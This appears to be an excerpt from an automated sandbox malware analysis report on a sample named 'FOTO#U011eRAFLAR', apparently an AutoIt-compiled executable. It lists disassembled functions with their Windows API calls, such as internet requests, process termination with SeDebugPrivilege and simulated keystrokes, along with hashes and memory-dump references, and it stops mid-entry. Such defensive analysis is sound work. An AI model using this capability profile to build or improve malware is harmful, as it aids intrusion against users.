                                                                      • Opcode Fuzzy Hash: 7afc8cb3673fa84afcba9c0c82d8fbb3dc958fa94b409648262893633fc14e9a
                                                                      • Instruction Fuzzy Hash: C9412332B043228B8B26CE79D98053B73E1FF95714B68852DE48E97684FB20DD49D7B1
                                                                      APIs
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?), ref: 00DA8D0F
                                                                        • Part of subcall function 00DA7D90: IsWindow.USER32(00ED6B18), ref: 00DA7E29
                                                                        • Part of subcall function 00DA7D90: IsWindowEnabled.USER32(00ED6B18), ref: 00DA7E35
                                                                      • GetMenuItemInfoW.USER32(?,?,?,?), ref: 00DA8DC1
                                                                      • GetMenuItemCount.USER32(?), ref: 00DA8DDE
                                                                      • GetMenuItemID.USER32(?), ref: 00DA8DEE
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DA8E20
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DA8E62
                                                                      • CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 00DA8E93
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Window$CheckCountEnabledProcRadio
                                                                      • String ID: 0
                                                                      • API String ID: 4045175071-4108050209
                                                                      • Opcode ID: 003eab53e214bea6fa20f28776a5910fc4306655098838bac17212eadf23c351
                                                                      • Instruction ID: 4aaa2d71062248b259b50e7074d5a3c675897f58a4688cbba09ebf09fe65060b
                                                                      • Opcode Fuzzy Hash: 003eab53e214bea6fa20f28776a5910fc4306655098838bac17212eadf23c351
                                                                      • Instruction Fuzzy Hash: 1C517971608341AFD710CF14D884AABBBE8FB8A354F040919FD85E7291DB32EA04DB72
                                                                      APIs
                                                                        • Part of subcall function 00D73F58: CharUpperBuffW.USER32(?,?,00000000,00DAD0D0,?,?,00000001,?,?,00D74286,?,?,?,?,00000000,00DAD0D0), ref: 00D73FE5
                                                                      • _wcslen.LIBCMT ref: 00D74296
                                                                      • _wcslen.LIBCMT ref: 00D742F0
                                                                      • _wcslen.LIBCMT ref: 00D74337
                                                                      • _wcslen.LIBCMT ref: 00D7437B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 1256254125-1994484594
                                                                      • Opcode ID: deaf13e9b117b6116877c442f250d287caf8f7b7364c5596df8a2be8085fcc8f
                                                                      • Instruction ID: f85b7f92abce484117e18b04cc5d68fbe81eee914a7aa40b2c0b48b62784119b
                                                                      • Opcode Fuzzy Hash: deaf13e9b117b6116877c442f250d287caf8f7b7364c5596df8a2be8085fcc8f
                                                                      • Instruction Fuzzy Hash: 49410132B043228BCB268EA9C58053B77E1FF95714B68C52DE88D97644FB20ED4997B1
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D8C190
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D8C1B8
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D8C1E8
                                                                      • GetLastError.KERNEL32 ref: 00D8C240
                                                                      • SetEvent.KERNEL32(?), ref: 00D8C254
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00D8C25F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 48eeba63edab36b2eb7b15b99c94c6dc4c7652d058e6194986256931d0d0e428
                                                                      • Instruction ID: b39df5f783b473e45dd60ac230fd5934e34f301eebea96939be40d3f39d8688b
                                                                      • Opcode Fuzzy Hash: 48eeba63edab36b2eb7b15b99c94c6dc4c7652d058e6194986256931d0d0e428
                                                                      • Instruction Fuzzy Hash: 24318B71520304EFD721AFA48C88BBB7BFCEB4A754B14A52AF446D2250DB34E9048BB4
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D547E6,?,?,Bad directive syntax error,00DAD0D0,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D797DA
                                                                      • LoadStringW.USER32(00000000,?,00D547E6,?), ref: 00D797E1
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D798A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      • Opcode ID: da0c0476ed63de953cb6c001435858b4aab7ff3c1e779410ba6c4531fe8d59b8
                                                                      • Instruction ID: 014f80686cb20c1784a5b2d82b4649ea9e4bc19d6b3a7568f23280c273cc5bfe
                                                                      • Opcode Fuzzy Hash: da0c0476ed63de953cb6c001435858b4aab7ff3c1e779410ba6c4531fe8d59b8
                                                                      • Instruction Fuzzy Hash: F6216B3280021ABFCF11AF90DC46EEE7735FF29314F084466F519621A2EA759558DBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f30dc30c830cb47d9b645f7f195f44e860548cd1ecd1d7ed0558aee291b8022
                                                                      • Instruction ID: bbf243c51d1d150ae93852419fdacdbf2c00cec574d02431949495bbff56ec0d
                                                                      • Opcode Fuzzy Hash: 9f30dc30c830cb47d9b645f7f195f44e860548cd1ecd1d7ed0558aee291b8022
                                                                      • Instruction Fuzzy Hash: 2DC1DF74E04249AFCF11EFA9C841BAEBBB1AF5A310F184199F554AB392CB709941DB70
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 00D176D0
                                                                      • GetWindowRect.USER32(?,?), ref: 00D17711
                                                                      • ScreenToClient.USER32(?,?), ref: 00D17739
                                                                      • GetClientRect.USER32(?,?), ref: 00D1787D
                                                                      • GetWindowRect.USER32(?,?), ref: 00D1789E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$Screen
                                                                      • String ID:
                                                                      • API String ID: 1296646539-0
                                                                      • Opcode ID: aff8b517deba347803a1ffe57c5a5a30530dc4890199ee87e6d56f4115da57f8
                                                                      • Instruction ID: 8005eddf9b2711510804fef04350029207de30188b2d26bcc9e879256450b4e0
                                                                      • Opcode Fuzzy Hash: aff8b517deba347803a1ffe57c5a5a30530dc4890199ee87e6d56f4115da57f8
                                                                      • Instruction Fuzzy Hash: E5C1497991464AEFDF10CFA8D444BEDBBB1FF08310F18941AEC95A3260DB34A995DB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 1282221369-0
                                                                      • Opcode ID: 53a86a04e14a89cdc77a0e009d7f41aa5c8555eed8b22467e1b0284ae4bcdefe
                                                                      • Instruction ID: dbfe2c049eb5e050c3b1efc4fafae71394b6844cd9e5a06d5e0385694501ad32
                                                                      • Opcode Fuzzy Hash: 53a86a04e14a89cdc77a0e009d7f41aa5c8555eed8b22467e1b0284ae4bcdefe
                                                                      • Instruction Fuzzy Hash: B1610572A06345ABDB21AFB49C8167A7BA5EF01310F0C017DF944DB281E7769981CBB0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00DA50BB
                                                                      • ShowWindow.USER32(?,00000000), ref: 00DA50FC
                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00DA5102
                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00DA5106
                                                                        • Part of subcall function 00DA6E88: DeleteObject.GDI32(00000000), ref: 00DA6EB4
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA5142
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA514F
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DA5182
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00DA51BC
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00DA51CB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 7890c72d63d4925d171239e4bc2b47f6e097a541142481529ed7cf0f0dce2a3d
                                                                      • Instruction ID: 83d71f83aaf1cda53f24538c93fc18ce9fbfd5446b8bc21d4e936186c17b98d1
                                                                      • Opcode Fuzzy Hash: 7890c72d63d4925d171239e4bc2b47f6e097a541142481529ed7cf0f0dce2a3d
                                                                      • Instruction Fuzzy Hash: 41518F31A50B08FFEF209F24EC45FA93B61EB06364F184111F9159A2E9C771D990DBB5
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D672E3
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D672FC
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D6730C
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D67324
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D67345
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D2A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00D67354
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D67371
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D2A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00D67380
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0
                                                                      • Opcode ID: e72659af4d494ba189414f4cbedf00a61a046443981994a2b38b92fbf46da55d
                                                                      • Instruction ID: 011c0fd5f7aa09360626b4b443858198c3987b7878953807d8b6d6a1250b3f3b
                                                                      • Opcode Fuzzy Hash: e72659af4d494ba189414f4cbedf00a61a046443981994a2b38b92fbf46da55d
                                                                      • Instruction Fuzzy Hash: BD517734A00309AFDB20DF28DC95FAA7BB5EB58768F144518F952D72A0DB70E990DB70
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D8C0A0
                                                                      • GetLastError.KERNEL32 ref: 00D8C0B3
                                                                      • SetEvent.KERNEL32(?), ref: 00D8C0C7
                                                                        • Part of subcall function 00D8C171: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D8C190
                                                                        • Part of subcall function 00D8C171: GetLastError.KERNEL32 ref: 00D8C240
                                                                        • Part of subcall function 00D8C171: SetEvent.KERNEL32(?), ref: 00D8C254
                                                                        • Part of subcall function 00D8C171: InternetCloseHandle.WININET(00000000), ref: 00D8C25F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0
                                                                      • Opcode ID: 307feea3d47bc941cc788dc568156e157573d3e110656453e15342869ff3648b
                                                                      • Instruction ID: 514876277eb5df22a4e0ee4e2fef234eb83b9b82917151e28a1627f40ad19121
                                                                      • Opcode Fuzzy Hash: 307feea3d47bc941cc788dc568156e157573d3e110656453e15342869ff3648b
                                                                      • Instruction Fuzzy Hash: 64317E71220705EFDB21AFA1CC88A6ABBF8FF45750B04651DF95AC2611D731E810DBB0
                                                                      APIs
                                                                        • Part of subcall function 00D73985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7399F
                                                                        • Part of subcall function 00D73985: GetCurrentThreadId.KERNEL32 ref: 00D739A6
                                                                        • Part of subcall function 00D73985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D724F7), ref: 00D739AD
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D72501
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D7251F
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00D72523
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D7252D
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D72545
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00D72549
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D72553
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D72567
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00D7256B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: e3ae0b7bd743517ac917e2b4ffeeac3dd61f2cecc811ade6b0608eec1995077e
                                                                      • Instruction ID: d6eaa8f1416ea1d23ae070c041c600abc0f50dc0465b685f081d457f9d67ab7e
                                                                      • Opcode Fuzzy Hash: e3ae0b7bd743517ac917e2b4ffeeac3dd61f2cecc811ade6b0608eec1995077e
                                                                      • Instruction Fuzzy Hash: DE01B5303A03147BFB1067699C8AF557E59DB9BB22F105005F318EE1E1CAE254458E79
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00D7138D,?,?,00000000), ref: 00D71750
                                                                      • HeapAlloc.KERNEL32(00000000,?,00D7138D,?,?,00000000), ref: 00D71757
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D7138D,?,?,00000000), ref: 00D7176C
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00D7138D,?,?,00000000), ref: 00D71774
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00D7138D,?,?,00000000), ref: 00D71777
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D7138D,?,?,00000000), ref: 00D71787
                                                                      • GetCurrentProcess.KERNEL32(00D7138D,00000000,?,00D7138D,?,?,00000000), ref: 00D7178F
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00D7138D,?,?,00000000), ref: 00D71792
                                                                      • CreateThread.KERNEL32(00000000,00000000,00D717B8,00000000,00000000,00000000), ref: 00D717AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 2eb6b993428f44aa037366229c0b5146229c2a8448e82f2e622b3cd099aeedb3
                                                                      • Instruction ID: 7b7b8ede53ffeab27d948f8851d37e349ea225c01b36116f5fffa93b70e0466d
                                                                      • Opcode Fuzzy Hash: 2eb6b993428f44aa037366229c0b5146229c2a8448e82f2e622b3cd099aeedb3
                                                                      • Instruction Fuzzy Hash: AB01BBB5350308BFE710ABA5DC4DF6B7BACEB8AB11F009411FA05DB2A1DA709804CB70
                                                                      APIs
                                                                        • Part of subcall function 00D7D3FA: CreateToolhelp32Snapshot.KERNEL32 ref: 00D7D41F
                                                                        • Part of subcall function 00D7D3FA: Process32FirstW.KERNEL32(00000000,?), ref: 00D7D42D
                                                                        • Part of subcall function 00D7D3FA: CloseHandle.KERNEL32(00000000), ref: 00D7D4FA
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D9A094
                                                                      • GetLastError.KERNEL32 ref: 00D9A0A7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D9A0DA
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D9A18F
                                                                      • GetLastError.KERNEL32(00000000), ref: 00D9A19A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9A1EB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: fb4a1240a72f05823a2a77c2fdcd70cd16069b9775f084a0a570e6feb66ef3e1
                                                                      • Instruction ID: 26e3a9f2a3756d9ec93b6beaf40a28ca341835da5c24885f734bfec253151243
                                                                      • Opcode Fuzzy Hash: fb4a1240a72f05823a2a77c2fdcd70cd16069b9775f084a0a570e6feb66ef3e1
                                                                      • Instruction Fuzzy Hash: 8F615E31208341AFDB20DF19C494F55BBA1AF54318F18849CE4668B7A2CB76ED85CBF2
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DA3858
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DA386D
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DA3887
                                                                      • _wcslen.LIBCMT ref: 00DA38CC
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DA38F9
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DA3927
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcslen
                                                                      • String ID: SysListView32
                                                                      • API String ID: 2147712094-78025650
                                                                      • Opcode ID: 31bbcca8f935c4c1f112041e3986b6d44e7d19c355b454aebe7cc5e76e1a7b6b
                                                                      • Instruction ID: 148689365a550523f9444b88b44f1bd79947f6d1bad5e9d1be12c37da8d23b3a
